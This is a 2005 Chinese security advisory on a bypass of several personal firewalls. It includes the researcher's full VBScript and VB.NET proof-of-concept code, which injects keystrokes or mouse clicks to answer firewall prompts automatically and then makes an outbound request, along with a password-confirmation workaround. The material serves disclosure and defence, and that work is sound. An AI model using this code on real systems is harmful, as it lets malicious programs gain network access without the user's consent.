多个防火墙产品设置绕过漏洞

发布日期:2005-01-03
更新日期:2005-01-04

受影响系统:
Zone Labs ZoneAlarm Pro 4.5.538.001
Zone Labs ZoneAlarm Pro 4.5
Symantec Norton Personal Firewall 2004
Symantec Norton Personal Firewall 2003
Symantec Norton Personal Firewall 2002
Kerio Personal Firewall 4.1.2
Kerio Personal Firewall 4.1.1
Kerio Personal Firewall 4.1.0
描述:
多数个人防火墙允许通过快捷键或者界面操作来控制通信。

多数个人防火墙的访问控制实现存在问题,远程攻击者可以利用这个漏洞,通过控制鼠标或者发送快捷键来绕过防火墙控制,完全访问系统。(从下文的测试脚本看,这些按键和鼠标事件是由已经在用户桌面会话中运行的本地程序发出的。)

攻击者可以编写一个VBScript脚本,该脚本会再启动一个自身的实例(以此模拟多线程);当第一个实例连接Internet时,第二个实例向防火墙的提示窗口发送快捷键,从而控制防火墙的行为,绕过控制。

另外也可以通过控制鼠标来绕过。程序没有使用真正的多线程,因为部分防火墙会直接中断程序的执行,因此程序改为带一个参数再启动另一个自身的实例来实现,绕过防火墙控制。

利用这个问题,可导致木马等恶意程序进行SERVER监听或者直接访问防火墙而不被防火墙提示。

<*来源:Ferruh Mavituna (ferruh@mavituna.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Ferruh Mavituna (ferruh@mavituna.com)提供了如下测试方法:

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
    'Const DELAY = 1000
    'Const TIMES = 1
    'Const EXTRADELAY = 0

'***********************************************************

' Proof-of-concept flow (defender's reading):
'   * Started with no arguments, the script relaunches itself with "/send"
'     and then makes one outbound HTTP HEAD request; that request is what
'     would make a personal firewall raise its permission prompt.
'   * Started with any argument, it only waits, injects keystrokes into
'     whichever window has focus, and quits.
' What to look for: a script host process spawning a second copy of the same
' script with an extra argument, right before an outbound request from the
' parent. The prompt is then answered by synthetic input, not by the user.
Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000      ' milliseconds slept before each round of keystrokes
Const TIMES = 1         ' number of keystroke rounds
Const EXTRADELAY = 0    ' optional extra wait (ms) before the first round; 0 disables it

appName = Wscript.ScriptName

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        ' SendKeys delivers input to the window that currently has focus; this
        ' sequence presumably relies on the firewall prompt being in the foreground.
        '1) First add it  trusted
        shell.sendKeys "+{TAB}" 'Go back once
        shell.sendKeys "{UP 2}" 'Go Up

        '1) Press Enter
        shell.sendKeys "{ENTER}" 'Enter
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' Parent mode: start the keystroke-mode copy without waiting for it, then
' trigger the outbound connection below.
Call shell.Run(appName & " /send")

'Connect
' Echoes the response headers returned by connect() followed by a fixed message.
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function
["anti-hacker.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'HISTORY
    '3/5/2004
        'Added ZA

    '5/5/2004
        'Added Kerio, Outpost

    '6/5/2004
        'Added Kaspersky Anti-Hacker
'***********************************************************

' Table-driven variant of the keystroke proof of concept (defender's reading):
'   * arrDelays(fw,0) is the sleep in milliseconds before each round and
'     arrDelays(fw,1) the number of rounds (see the While loop below).
'   * arrKeys(fw,j) holds the keystroke strings sent in order; empty slots
'     are skipped.
'   * arrRegistry is declared but not used anywhere in this listing.
' Only the Kaspersky row is filled in here. Without arguments the script
' relaunches itself with "/send" and then makes an outbound HTTP request;
' with an argument it only injects the configured keystrokes and quits.
' What to look for: a script host spawning a second copy of the same script
' with an extra argument, followed by an outbound request from the parent.
Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
    '// Firewalls
    'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
    Const ZoneAlarm = 0
    
    'Kerio 4.0.14
    Const Kerio = 1

    'Agnitium Outpost Firewall 2.1.303.4009 (314)
    Const Outpost = 2

    'Kaspersky Anti-Hacker 1.5.119.0
    Const Kaspersky = 3

    'Select Active Firewall
    intFirewall = Kaspersky

    '// Configuration
    'Kaspersky Anti-Hacker
    arrDelays(Kaspersky,0) = 1000
    arrDelays(Kaspersky,1) = 1

    'Define Keys for Firewalls
    arrKeys(Kaspersky,0) = "{ENTER}"



' Placeholder only: automatic product detection is not implemented.
If DETERMINEFIREWALL Then
    'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<arrDelays(intFirewall,1)
        i=i+1
        WScript.Sleep arrDelays(intFirewall,0)
        
        'Send Keys
        ' SendKeys delivers input to the window that currently has focus.
        For j=0 To Ubound(arrKeys,2)
            If arrKeys(intFirewall,j)<>"" Then
                shell.sendKeys arrKeys(intFirewall,j)
            End If
        Next

    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' Parent mode: start the keystroke-mode copy, then trigger the outbound connection.
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function
["ZoneAlarm.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
' Proof-of-concept flow (defender's reading):
'   * Started with no arguments, the script launches "skipZA.vbs /send" and
'     then makes one outbound HTTP HEAD request.
'   * Started with any argument, it repeatedly injects two Alt-key shortcuts
'     into whichever window has focus, then quits.
' What to look for: a script host spawning a second script process with an
' extra argument, right before an outbound request from the parent.
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10    ' milliseconds slept before each round of keystrokes
Const TIMES = 15    ' number of keystroke rounds

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        ' "%" is the SendKeys notation for Alt; input goes to the focused window.
        shell.sendKeys "%R" 'Remember, Do not ask again !
        shell.sendKeys "%Y" 'Click Yes
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' The child command line names skipZA.vbs literally rather than using this
' script's own name.
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function
["testFirewall.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Simple Firewall Test File
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
' Plain connectivity check: tries one HTTP HEAD request and reports whether
' it went through. It sends no keystrokes, so it shows what the firewall does
' when nothing answers the prompt on the user's behalf.
Option Explicit

Dim shell, sendKeyMod, Result
Const URL = "http://ferruh.mavituna.com"

' Announce the target before attempting the request.
Wscript.Echo "Now I'll try to connect to " & URL

' Report failure first, otherwise print the headers that came back.
If Not connect(URL,Result) Then
    Wscript.Echo "OK, I couldn't access to Internet"
Else
    Wscript.Echo "Mission Accomplished..., Here is the headers;" & vbNewline & Result
End If

Set shell = Nothing
Wscript.Quit 1

' Tries a synchronous HTTP HEAD request to URL. Result receives the raw
' response headers when the request gets that far. The function value is
' True unless a runtime error was recorded in Err along the way.
Function connect(ByVal URL, ByRef Result)
    Dim httpReq
    connect = True

    ' Errors are suppressed and inspected once at the end.
    On Error Resume Next
    Err.Clear

    Set httpReq = CreateObject("Microsoft.XmlHttp")
    httpReq.open "HEAD", URL, False
    httpReq.send ""
    Result = httpReq.getAllResponseHeaders
    Set httpReq = Nothing

    If Err.Number <> 0 Then connect = False
End Function
["norton.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
' Proof-of-concept flow (defender's reading):
'   * Started with no arguments, the script launches "skipZA.vbs /send" and
'     then makes one outbound HTTP HEAD request.
'   * Started with any argument, it repeatedly injects two Alt-key shortcuts
'     into whichever window has focus, then quits.
' What to look for: a script host spawning a second script process with an
' extra argument, right before an outbound request from the parent.
Option Explicit

Dim argLen, shell, sendKeyMod, i
Const DELAY = 10    ' milliseconds slept before each round of keystrokes
Const TIMES = 15    ' number of keystroke rounds

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        ' "%" is the SendKeys notation for Alt; input goes to the focused window.
        shell.sendKeys "%A" 'Remember, Do not ask again !
        shell.sendKeys "%O" 'Click Yes
    Wend
    'Customized for norton fw by Oezguer Mavituna
    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' The child command line names skipZA.vbs literally rather than using this
' script's own name.
Call shell.Run("skipZA.vbs /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function
["mousecontrol.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 5/19/2004
'// Simple POC for Bypassing multiple firewall products
'// Code : VB.NET
'***********************************************************

' Declarations for the mouse-driven variant: user32 mouse_event is used to
' synthesize button events and kernel32 Sleep to pace them.
' NOTE(review): the trailing "\" characters in this listing look like
' line-wrapping artifacts from the mail archive, not VB syntax.
' Defender note: the only inputs the firewall prompt receives are synthetic
' mouse events from an ordinary user-mode process in the same desktop session.
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As \
Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As Long)  Private \
Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)


    ' mouse_event flag values; only the LEFTDOWN/LEFTUP pair is used in this listing.
    Private Const MOUSEEVENTF_LEFTDOWN = &H2
    Private Const MOUSEEVENTF_LEFTUP = &H4
    Private Const MOUSEEVENTF_MIDDLEDOWN = &H20
    Private Const MOUSEEVENTF_MIDDLEUP = &H40
    Private Const MOUSEEVENTF_RIGHTDOWN = &H8
    Private Const MOUSEEVENTF_RIGHTUP = &H10

    ' sleepTime is multiplied by 1000 before being passed to Sleep in the load handler.
    Private Const sleepTime = 0.5    'As Second
    ' When True, the load handler inserts a one-second pause before each click.
    Private Const slowMotion = True    'Debug !

    'Firewalls
    Const ZoneAlarm As Integer = 0

    'Set Points
    ' Per product: (x, y) of the first click target, then (x, y) of the second.
    Dim arrFirewalls(1, 3) As Integer
    Dim activeFirewall As Integer = ZoneAlarm

    ' Fills arrFirewalls(ZoneAlarm, 0..3) with two screen positions computed as
    ' fixed pixel offsets from the primary screen's width and height; the
    ' original comments label them "Remember" and "Yes".
    ' NOTE(review): as extracted, the screenY/screenX declarations are fused
    ' into the wrapped comment line below (archive line wrapping).
    ' Defender note: the targets are fixed offsets, so they depend on screen
    ' geometry and on where the prompt is drawn; the code does not check what
    ' is actually at those positions.
    Private Sub setupFirewalls()
        'Get Current Screen
        'This is just POC, Real World Example should automaticly detect installed firewall, \
change sleep times, car about exact positoin, taskbar position etc. But It's easy to \
write a real world example  Dim screenY As Integer = \
Screen.PrimaryScreen.Bounds.Height  Dim screenX As Integer = \
Screen.PrimaryScreen.Bounds.Width

        arrFirewalls(ZoneAlarm, 0) = screenX - 250        'X Remember !
        arrFirewalls(ZoneAlarm, 1) = screenY - 130         'Y

        arrFirewalls(ZoneAlarm, 2) = screenX - 190         ' Yes
        arrFirewalls(ZoneAlarm, 3) = screenY - 93

    End Sub

    ' Form load handler; the two modes are selected by the command line.
    '   * With an argument: wait, compute the click targets, click the two
    '     configured positions, repeat the pair once more, then dispose the form.
    '   * Without an argument: start a second copy of this executable with the
    '     argument "skipme", attempt a download, and show a message box on success.
    ' The form hides itself in both modes.
    ' What to look for: an executable relaunching itself with an extra argument
    ' while the parent makes an outbound request, with no visible window.
    Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e As \
System.EventArgs) Handles MyBase.Load

        'Hide  App
        Me.ShowInTaskbar = False
        Me.Visible = False

        'Args
        Dim flagArg As String = Application.ExecutablePath

        ' GetCommandLineArgs() includes the program itself, so Length > 1 means
        ' at least one real argument was passed.
        If Environment.GetCommandLineArgs().Length > 1 Then

            'Sleep;
            Sleep(sleepTime * 1000)

            'Try;
            setupFirewalls()

            If slowMotion Then Sleep(1000)

            'First Access
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

            'Gain Access for HTTP
            ' Second pair of clicks, presumably for a second prompt — confirm against the advisory.
            Sleep(300)

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

            If slowMotion Then Sleep(1000)
            bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

            'Quit !
            Me.Dispose()
        Else

            ' Parent mode: launch the click-mode copy, then trigger the outbound request.
            System.Diagnostics.Process.Start(flagArg, "skipme")

            'Access Internet
            If downloadURL() Then
                MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", \
MessageBoxButtons.OK, MessageBoxIcon.Warning)

            End If

            Me.Dispose()
        End If

    End Sub


    'Bypas POC
    ' Moves the cursor to (X, Y), issues a left-button down/up pair through
    ' mouse_event, then puts the cursor back where it was.
    ' Defender note: the click lands on whatever is at that screen position;
    ' nothing here verifies that a firewall prompt is displayed there.
    Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
        'Save Old Positions for return !
        Dim oldX As Integer = Cursor.Position.X
        Dim oldY As Integer = Cursor.Position.Y

        'Set New Position
        Cursor.Position = New Point(X, Y)

        'Click
        ' The dx/dy arguments are 0: the event is raised at the current cursor position.
        mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
        mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

        'Return
        Cursor.Position = New Point(oldX, oldY)

    End Sub

    'Connect Internet
    Private Function downloadURL() As Boolean
        downloadURL = True
        Try
            Dim wc As New System.Net.WebClient()
            wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")
        Catch
            MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, \
MessageBoxIcon.Error)  downloadURL = False
        End Try
    End Function


["bypassSendKey.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
    '3/5/2004
        'Added ZA

    '5/5/2004
        'Added Kerio, Outpost

    '6/5/2004
        'Added Kaspersky Anti-Hacker
    
    '5/9/2004
        'LooknStop

    '5/20/2004
        'Norton
'***********************************************************

' Table-driven variant of the keystroke proof of concept (defender's reading):
'   * arrDelays(fw,0) is the sleep in milliseconds before each round and
'     arrDelays(fw,1) the number of rounds (see the While loop below).
'   * arrKeys(fw,j) holds the keystroke strings sent in order; empty slots
'     are skipped.
'   * arrRegistry is declared but not used anywhere in this listing.
' Without arguments the script relaunches itself with "/send" and then makes
' an outbound HTTP request; with an argument it only injects the keystrokes
' configured for intFirewall into whichever window has focus and quits.
' What to look for: a script host spawning a second copy of the same script
' with an extra argument, followed by an outbound request from the parent.
' Every row below amounts to answering the product's prompt from the keyboard,
' which is why the advisory's workaround is to require a password for allow
' actions.
Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
    '// Firewalls
    'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com
    Const ZoneAlarm = 0
    
    'Kerio 4.0.14
    Const Kerio = 1

    'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
    Const Outpost = 2

    'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
    Const Kaspersky = 3

    'Look 'n' Stop 2.04p2 | www.looknstop.com
    Const LooknStop = 4

    'Norton | www.norton.com
    Const Norton = 5

    'Select Active Firewall
    intFirewall = ZoneAlarm


    '// Configuration
    'Define Keys, Delays, Repeat Times for Firewalls
    
    'Kaspersky Anti-Hacker
    arrDelays(Kaspersky,0) = 400
    arrDelays(Kaspersky,1) = 2

    arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK

    'ZoneAlarm
    arrDelays(ZoneAlarm,0) = 10
    arrDelays(ZoneAlarm,1) = 15

    arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
    arrKeys(ZoneAlarm,1) = "%Y" 'Yes

    'Outpost
    arrDelays(Outpost,0) = 1000
    arrDelays(Outpost,1) = 1

    arrKeys(Outpost,0) = "+{TAB}" 'Go back once
    arrKeys(Outpost,1) = "{UP 2}" 'Go Up
    arrKeys(Outpost,1) = "{ENTER}" 'Enter

    'Kerio
    arrDelays(Kerio,0) = 100
    arrDelays(Kerio,1) = 10

    arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
    arrKeys(Kerio,1) = "%P" ' Yes

    'LookNStop
    arrDelays(LooknStop,0) = 1000
    arrDelays(LooknStop,1) = 1

    arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
    arrKeys(LooknStop,1) = "{LEFT}" ' Left
    arrKeys(LooknStop, 2) = " " ' Space

    'Norton
    arrDelays(Norton,0) = 100
    arrDelays(Norton,1) = 5

    arrKeys(Norton,0) = "%A" ' Allow
    arrKeys(Norton,1) = "%O" ' OK


' Placeholder only: automatic product detection is not implemented.
If DETERMINEFIREWALL Then
    'TODO:Read Registries and determine it !
End If

Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    
    'First Sleep for a while
    If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

    'Force
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<arrDelays(intFirewall,1)
        i=i+1
        WScript.Sleep arrDelays(intFirewall,0)
        
        'Send Keys
        ' SendKeys delivers input to the window that currently has focus.
        For j=0 To Ubound(arrKeys,2)
            If arrKeys(intFirewall,j)<>"" Then
                shell.sendKeys arrKeys(intFirewall,j)
            End If
        Next

    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' Parent mode: start the keystroke-mode copy, then trigger the outbound connection.
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function
["Kerio.txt" (text/plain)]

'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Kerio 4.0.14
'5/5/2004
'Ferruh Mavituna
    'Const DELAY = 100
    'Const TIMES = 10
'***********************************************************

' Proof-of-concept flow (defender's reading):
'   * Started with no arguments, the script relaunches itself with "/send"
'     and then makes one outbound HTTP HEAD request.
'   * Started with any argument, it repeatedly injects a space and an Alt-key
'     shortcut into whichever window has focus, then quits.
' What to look for: a script host spawning a second copy of the same script
' with an extra argument, right before an outbound request from the parent.
Option Explicit

Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 100   ' milliseconds slept before each round of keystrokes
Const TIMES = 10    ' number of keystroke rounds

appName = Wscript.ScriptName

'SendKey
' Mode switch: any command-line argument at all selects keystroke mode.
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then
    ' i is never assigned before the loop; VBScript treats the Empty value as 0 here.
    While i<TIMES
        i=i+1
        WScript.Sleep DELAY
        ' "%" is the SendKeys notation for Alt; input goes to the focused window.
        shell.sendKeys " " 'Remember, Do not ask again !
        shell.sendKeys "%P" 'Click Yes
    Wend

    'Exit
    'Wscript.Echo "Exit !"
    Wscript.Quit 1
End If

'Wscript.Echo WScript.ScriptFullName
' Parent mode: start the keystroke-mode copy, then trigger the outbound connection.
Call shell.Run(appName & " /send")

'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing
Wscript.Quit 1


' Sends a synchronous HTTP HEAD request to URL and returns the raw response
' headers as one string. There is no error handling: a failed request raises
' a runtime error in the caller.
Function connect(ByVal URL)
    Dim httpReq, headerText
    Set httpReq = CreateObject("Microsoft.XmlHttp")
    With httpReq
        .open "HEAD", URL, False
        .send ""
        headerText = .getAllResponseHeaders
    End With
    Set httpReq = Nothing
    connect = headerText
End Function

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*  将防火墙配置为:所有“允许”操作都必须输入密码确认。

厂商补丁:

Zone Labs
---------
ZoneLabs Team已经提供最新版本修正此漏洞:

http://www.zonelabs.com/

本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载